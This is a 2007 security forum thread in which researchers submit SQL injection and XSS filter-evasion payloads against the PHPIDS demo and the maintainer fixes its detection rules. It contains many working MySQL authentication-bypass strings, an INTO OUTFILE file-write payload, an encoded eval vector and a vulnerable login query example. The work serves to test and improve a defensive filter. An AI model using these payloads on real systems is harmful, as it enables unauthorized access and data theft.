Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Whether this is about ha.ckers.org, sla.ckers.org or some other project you are interested in or want to talk about, throw it in here to get feedback. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
Pages: PreviousFirst...4567891011121314...LastNext
Current Page: 9 of 31
Re: PHPIDS (0.4 was just released)
Posted by: Reiners
Date: September 21, 2007 04:23PM

tx Wrote:
-------------------------------------------------------
> The comment rule
> (?:"\s*(?:#|--|{))|(?:\/\*!\s?\d+)|(?:ch(?:a)?r\s*
> \(\s*\d) catches ?test=' #1 !
> but can be evaded with ?test=' {some expression or
> text here} #{some alphanum} !

As already discussed its very hard to filter "#" correctly because of false positives:
He's Player #1 !

So in my opinion its more important to concentrate on the injection itself (which also work without comments):
having '1
SOUNDS LIKE '1

Options: ReplyQuote
Re: PHPIDS (0.4 was just released)
Posted by: tx
Date: September 21, 2007 04:54PM

@Reiners: Yeah, good point on that.
Well for the record, here is another comment evasion:
http://demo.php-ids.org/?test=%27%3B--%20-%7Balphanum%7D-
?test=;-- -{alphanums}-
where {alphanums} is any alphanumeric string

-tx @ lowtech-labs.org

Options: ReplyQuote
Re: PHPIDS (0.4 was just released)
Posted by: Reiners
Date: September 21, 2007 06:10PM

.mario Wrote:
-------------------------------------------------------
> I couldn't wait... all fixx0red :)

they still all work :D
replace all the "asd" with "a sd"

and for the into outfile:
http://demo.php-ids.org/?test=asd'%20INTO%20OUTFILE%2b'C:/webserver/www/readme.php

greetings and a nice weekend ;)

Options: ReplyQuote
Re: PHPIDS (0.4 was just released)
Posted by: Reiners
Date: September 22, 2007 07:56AM

Hi .mario!
most injections get detected now. But again there might be a problem with false positives:
--> ?test=Results are 'true' or 'false'. (php-ids)
--> ?test=Choose between "red" and "green". (php-ids)
--> ?test=SQL Injection contest is coming in around '1 OR '2 weeks. (php-ids)

I guess it is very hard to find a rule for those short "or" sqli without triggering false positives. But I'm sure you will find a way :)

Same for the next injections.
--> ?test=asd' or column^'-1 (php-ids)
--> ?test=asd' or column sounds like '1 (php-ids)
In my opinion those two are not critical, because an attacker would have to guess the column name first and it may be wrong to filter every alphanumeric string behind "' or".

On the other hand the next two can always be used by an attacker:
--> ?test=asd' or md5(5)^'1 (php-ids)
--> ?test=asd' or true -- a (php-ids)


Just some thoughts :)

Options: ReplyQuote
Re: PHPIDS (0.4 was just released)
Posted by: Anonymous User
Date: September 22, 2007 09:35AM

Hi!

@Reiners: You are creating very hard conditions for the coming contest - hats off ;)

The last ones were pretty hard to fix and required some modifications of the rules and the converter. Also I am still having problems with the comment detection and think about removing # from detection because it's almost impossible to use it the right manner - though makes not that much sense.

The false alerts are fixed and I will take a look at the injections next. Thanks a lot for your submissions!

There's another thing I want to talk about. The last nights I played a little bit levenshtein, soundex and other ways to compare and modify the attacks we have stored in our unit tests. After some time I had some script running which provided pretty surprising output (it's included in the trunk for testing purposes, the demo uses it too right now).

http://groups.google.com/group/php-ids/browse_thread/thread/ed6f0084bc0eb490
http://php-ids.org/files/centrifuge.phps

Maybe it's total bull - maybe we can make use of that. I am not sure - please let me know what you think!

Greetings,
.mario

Options: ReplyQuote
Re: PHPIDS (0.4 was just released)
Posted by: Anonymous User
Date: September 22, 2007 12:22PM

That sounds good mario! I've been interested in levenshtein for a long time, can you explain how you implemented it?

Rememeber that I once suggest to have a first layer or triage upon reserved chars in the URI? like: {' " ~ ^ # $ ( )} ?

In combination with data length, it could sort out a lot I guess.

Anyway, interesting.

Options: ReplyQuote
Re: PHPIDS (0.4 was just released)
Posted by: Reiners
Date: September 22, 2007 12:45PM

Hi!
the new filter can be circumvented with an escaped quote:
--> ?test=\'asd' or 1='1 (php-ids)

Actually I should start to keep some filter evasions for the contest ;)

greetings, Reiners

edit:
--> ?test=a 1' or if(-1=-1,true,false)#! (php-ids)



Edited 2 time(s). Last edit at 09/22/2007 12:53PM by Reiners.

Options: ReplyQuote
Re: PHPIDS (0.4 was just released)
Posted by: Spyware
Date: September 22, 2007 12:59PM

http://demo.php-ids.org/?test=select%20*something*%20from%20the%20menu

Options: ReplyQuote
Re: PHPIDS (0.4 was just released)
Posted by: Anonymous User
Date: September 22, 2007 02:39PM

@Ronald: Yep - I remember :) I built this after having no success with levenshtein and pattern comparison. It basically strips out any normal character, normalizes the specials chars and sorts the array. That way attack patterns like (((++::: appear for 85% of all long attacks (concatenation vectors, self-contained xss, filter evasion vectors in general). I think the recent contest showed that one can't rely on blacklisting only.

@Reiners: Wow - I like the escaped one - very cool!

@Spyware: thx for the fa - will fix immediately...

Options: ReplyQuote
Re: PHPIDS (0.4 was just released)
Posted by: Spyware
Date: September 22, 2007 03:22PM

http://demo.php-ids.org/?test=--%3Ewatch%20this%3C--
http://demo.php-ids.org/?test=5%A3%20for%20%22THIS%22



Edited 2 time(s). Last edit at 09/22/2007 03:25PM by Spyware.

Options: ReplyQuote
Re: PHPIDS (0.4 was just released)
Posted by: Reiners
Date: September 22, 2007 04:15PM

@.mario: almost fixed, but escaped quotes can still be used:
--> ?test=111\'aaa' or '1 php-ids

I was just going to show up with some functions which return true (without comparing to a value).
--> ?test=asd' or ISNULL(1/0) #(
--> ?test=asd' or LEAST(2,1) -- -a
But you fixed that already. good job!



Edited 2 time(s). Last edit at 09/22/2007 04:32PM by Reiners.

Options: ReplyQuote
Re: PHPIDS (0.4 was just released)
Posted by: Gareth Heyes
Date: September 23, 2007 03:02PM

x=&#x65&#x76&#x61&#x6c,y=&#x61&#x6c&#x65&#x72&#x74&#x28&#x31&#x29
x(y)

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: PHPIDS (0.4 was just released)
Posted by: Reiners
Date: September 23, 2007 07:51PM

Hi .mario!
would you mind if I load the smoketest with a script over and over? I collected some "or" sqli and would like to test them via script modified in different ways.
greetings, Reiners

Options: ReplyQuote
Re: PHPIDS (0.4 was just released)
Posted by: Anonymous User
Date: September 24, 2007 01:28AM

@Gareth: Nice one - as already stat on the group that one pointed on a big ugly bug in the converter. Thx!

@Reiners: No problem!

Options: ReplyQuote
Re: PHPIDS (0.4 was just released)
Posted by: Reiners
Date: September 24, 2007 03:10AM

Hi!
after the first shoot I get a 403 when accessing the site :( (had about 40 injections loaded).
until that the script worked out quite well :)

Options: ReplyQuote
Re: PHPIDS (0.4 was just released)
Posted by: Anonymous User
Date: September 24, 2007 02:20PM

Hi!

Hmmm - that shouldn't be - the regression tests for the demo fire around 700 requests a minute at the demo...

What's the exact url you tried?

Options: ReplyQuote
Re: PHPIDS (0.4.1 fresh out of the lab)
Posted by: Reiners
Date: September 24, 2007 03:47PM

I had a typo in my script trying to load demo-php.ids.org ... it was early in the morning ;)

seems like you filter everything very well.
I already mentioned this one:
--> ?test=aa'or column='1 (php-ids)

this wasnt that critical because the attacker first would have to guess the column name and its hard to filter words behind "or".
However there are some constants which can be used by an attacker (tested on MySQL, but on other DBMS there might be similar contants to use):

--> ?test=aa'or LOCALTIME!='0 (php-ids)
--> ?test=aa'or BINARY 1= '1 (php-ids)
--> ?test=aa'or current_user!=' 1 (php-ids)

--> ?test=aa'or null is null #( (php-ids)

greetings,
Reiners

Options: ReplyQuote
Re: PHPIDS (0.4.1 fresh out of the lab)
Posted by: tx
Date: September 24, 2007 09:59PM

more authentication bypass, mostly based around '+'.
I'm just too eager for an sqli contest I think :)

This http://demo.php-ids.org/?test=%27%20or%20username%20REGEXP%20%27admi*%27%20having%201%20%231%20%21 is still getting through.
?test=' or username REGEXP 'admi*' having 1 #1 !

Selecting by id: http://demo.php-ids.org/?test=%27%20or%20id%3D+1%20having%201%20%231%20%21
?test=' or id=+1 having 1 #1 !

Slightly modified version: http://demo.php-ids.org/?test=%27%20or%20id%3D+2-1%20having%201%20%231%20%21
?test=' or id=+2-1 having 1 #1 !

I suppose both of those require that the attacker know the id, but if an IDS isn't seeing the queries, brute forcing the id is pretty trivial.

Soundex: http://demo.php-ids.org/?test=%27%20or%20username%20SOUNDS%20LIKE+%22adnin%22%20and%201%3B%20--%20-a
' or username SOUNDS LIKE+"adnin" and 1; -- -a

Specifying table.column (and more '+'): http://demo.php-ids.org/?test='%20or%20users.username=%2b0x61646D696E;%20--%20-a
?test=' or users.username=+0x61646D696E; -- -a


EDIT:
some union select action: http://demo.php-ids.org/?test=%27%20%28begin%20union%20%28select+aaa%2Cbbb%20from%20ccc%3B%29%20end%29%3B%20--%20-a
?test=' (begin union (select+aaa,bbb from ccc;) end); -- -a

-tx @ lowtech-labs.org



Edited 2 time(s). Last edit at 09/24/2007 11:05PM by tx.

Options: ReplyQuote
Re: PHPIDS (0.4.1 fresh out of the lab)
Posted by: Anonymous User
Date: September 25, 2007 01:57AM

"brute forcing the id" ^^

Okay, hey is this test form only POST or does it also represent GET? a ton of difference if you ask me. Why not cut to the chase and alert reserved chars in the request_uri, saves you 50% headaches.

Options: ReplyQuote
Re: PHPIDS (0.4.1 fresh out of the lab)
Posted by: Gareth Heyes
Date: September 25, 2007 03:54AM

What's the purpose of the SQL injection contest? Just get a different ID or more dangerous injection?

http://demo.php-ids.org/?test='%20OR%20UserID%20<>%202
http://demo.php-ids.org/?test='%20OR%20UserID%20IS%20NOT%20NULL
http://demo.php-ids.org/?test='%20OR%20UserID%20RLIKE%20'.+'%20
http://demo.php-ids.org/?test='%20OR%20UserID%20>%201

What about when the XSS rules overlap with SQL rules? So what if the SQL rules aren't triggered but the XSS rule is?

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]



Edited 1 time(s). Last edit at 09/25/2007 03:56AM by Gareth Heyes.

Options: ReplyQuote
Re: PHPIDS (0.4.1 fresh out of the lab)
Posted by: Reiners
Date: September 25, 2007 03:35PM

this one is cool (onyl tested on MySQL):
--> ?test=a'='a (php-ids)
or
--> ?test='=' (php-ids)

it works for table listing and auth bypass:
select data from users where name=''='' and password=''=''

with this there are of course a lot of different vectors, since we dont need the "or" anymore.
--> ?test=a'!='0
--> ?test=aa'IS NOT NULL#(
--> ?test=0'XOR'1
--> ?test=a'IN('a')#(
and so on



Edited 1 time(s). Last edit at 09/25/2007 03:45PM by Reiners.

Options: ReplyQuote
Re: PHPIDS (0.4.1 fresh out of the lab)
Posted by: Anonymous User
Date: September 25, 2007 04:46PM

Hi!

Thanks for the submissions - I am totally swamped in work right now but I will try to fix them tomorrow or Thursday...

I like
' OR UserID <> 2
and
'='
best - not UserId 2 matches 1 first - sweet!

Greetings,
.mario

Options: ReplyQuote
Re: PHPIDS (0.4.1 fresh out of the lab)
Posted by: tx
Date: September 25, 2007 07:12PM

@Ronald: The form accepts POST and GET

Here is a new Auth Bypass, no commenting necessary: http://demo.php-ids.org/?test=abc%27%20NOT%20BETWEEN%20%270
?test=abc' NOT BETWEEN '0

Auth bypass using MATCH (column) AGAINST ('+true -false' IN BOOLEAN MODE): http://demo.php-ids.org/?test=%27%20or%20MATCH%20%28username%29%20AGAINST%20%28%27+admin%20-asds%27%20IN%20BOOLEAN%20MODE%29%20%3B--%20-a
?test=' or MATCH (username) AGAINST ('+admin -asds' IN BOOLEAN MODE) ;-- -a

-tx @ lowtech-labs.org



Edited 3 time(s). Last edit at 09/25/2007 07:25PM by tx.

Options: ReplyQuote
Re: PHPIDS (0.4.1 fresh out of the lab)
Posted by: Anonymous User
Date: September 26, 2007 04:47PM

Hey guys,

I already fixed a bunch of them but not yet all. Will do Thursday evening! Sorry for the lame recent response but I hope after this week has passed I won't be stacked with work that much anymore so it'll get better soon ;)

Greetings and thanks!
.mario

Options: ReplyQuote
Re: PHPIDS (0.4.1 fresh out of the lab)
Posted by: tx
Date: September 26, 2007 10:00PM

@mario: no worries, I don't know anybody who competes with your fixes+feedback turn around time. beats the hell out of google's 7 days :P

-tx @ lowtech-labs.org



Edited 1 time(s). Last edit at 09/26/2007 10:01PM by tx.

Options: ReplyQuote
Re: PHPIDS (0.4.1 fresh out of the lab)
Posted by: Anonymous User
Date: September 27, 2007 10:33AM

Hi!

They should be fixed right now - tests are updated, regression test suite still running and as it seems no noticeable raise on false alerts. Thx!

Greetings,
.mario

Options: ReplyQuote
Re: PHPIDS (0.4.1 fresh out of the lab)
Posted by: Reiners
Date: September 27, 2007 11:36AM

aa'!='1 (php-ids)
aa'!=~'1 (php-ids)
aa'=('aa')#(
aa'|+'1
aa'|!'aa
aa'^!'aa
... (and all those operands and prefixes)

aa'/0 is null #( (php-ids)
aa' DIV null is null #( (php-ids)
aa'DIV+1='aa (php-ids)
aa'or column!='1 (php-ids)
aa'or column DIV null IS NULL #( (php-ids)
aa'or column+(1)='1 (php-ids)
aa'or id sounds like'\' (php-ids)



Edited 3 time(s). Last edit at 09/27/2007 12:08PM by Reiners.

Options: ReplyQuote
Re: PHPIDS (0.4.1 fresh out of the lab)
Posted by: tx
Date: September 27, 2007 03:09PM

@.mario: excellent fixes!

The MATCH...AGAINST auth bypass is still undetected: http://demo.php-ids.org/?test=%27%20or%20MATCH%20%28username%29%20AGAINST%20%28%27%2badmin%20-asds%27%20IN%20BOOLEAN%20MODE%29%3B%20--%20-a
?test=' or MATCH (username) AGAINST ('+admin -asds' IN BOOLEAN MODE) ;-- -a

Modified versions of the NOT BETWEEN vector: http://demo.php-ids.org/?test=abc%27%20NOT%20BETWEEN%20%21%21%270
?test=abc' NOT BETWEEN !!'0
This works with any even amount of '!' (w00t double negatives!):
?test=abc' NOT BETWEEN !!!!'0
?test=abc' NOT BETWEEN !!!!!!!!!!!!!!'0
More variations (likewise with multiple negation):
?test=abc' NOT BETWEEN !0 = !!'0
?test=abc' NOT BETWEEN !0 != !!!'0
?test=abc' NOT BETWEEN !+0 != !'0

I really think NOT BETWEEN is cool because it completely changes the context of the second clause in certain types of auth queries:
$sql = "SELECT * FROM `users` WHERE username='".$_GET['u']."' and password='".$_GET['p']."' LIMIT 1";

if 
  $_GET['u']= "' NOT BETWEEN !+0 != !'0"
  $_GET['p']= ''
query becomes:
SELECT * FROM `users` WHERE username='' NOT BETWEEN !+0 != !'0' and password='' LIMIT 1";
bam!

:)

-tx @ lowtech-labs.org



Edited 3 time(s). Last edit at 09/27/2007 03:34PM by tx.

Options: ReplyQuote
Re: PHPIDS (0.4.1 fresh out of the lab)
Posted by: Spyware
Date: September 27, 2007 03:27PM

I don't know much of SQL injection but, isn't this exploitable:
http://demo.php-ids.org/?test=+z'

EDIT 1/3:
(Don't click, copy paste, quote gets cut off) (Copy paste won't work either xD, do it manually)

EDIT 2:
False
http://demo.php-ids.org/?test=so%20I%20said%20%22back%20off!%22



Edited 3 time(s). Last edit at 09/27/2007 03:35PM by Spyware.

Options: ReplyQuote
Re: PHPIDS (0.4.1 fresh out of the lab)
Posted by: tx
Date: September 27, 2007 03:45PM

@Spyware: in most queries +z' will leave you with an uneven number of quotes which will throw an error.
ie:
 Select * from `table` where id={injection point};
becomes
Select * from `table` where id=+z';

EDIT: @Spyware: %27 is your friend. %27 = '

-tx @ lowtech-labs.org



Edited 2 time(s). Last edit at 09/27/2007 03:47PM by tx.

Options: ReplyQuote
Pages: PreviousFirst...4567891011121314...LastNext
Current Page: 9 of 31


Sorry, only registered users may post in this forum.